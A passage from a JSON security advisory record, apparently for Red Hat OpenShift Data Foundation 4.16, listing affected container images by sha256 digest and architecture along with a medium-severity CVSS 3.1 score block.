"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
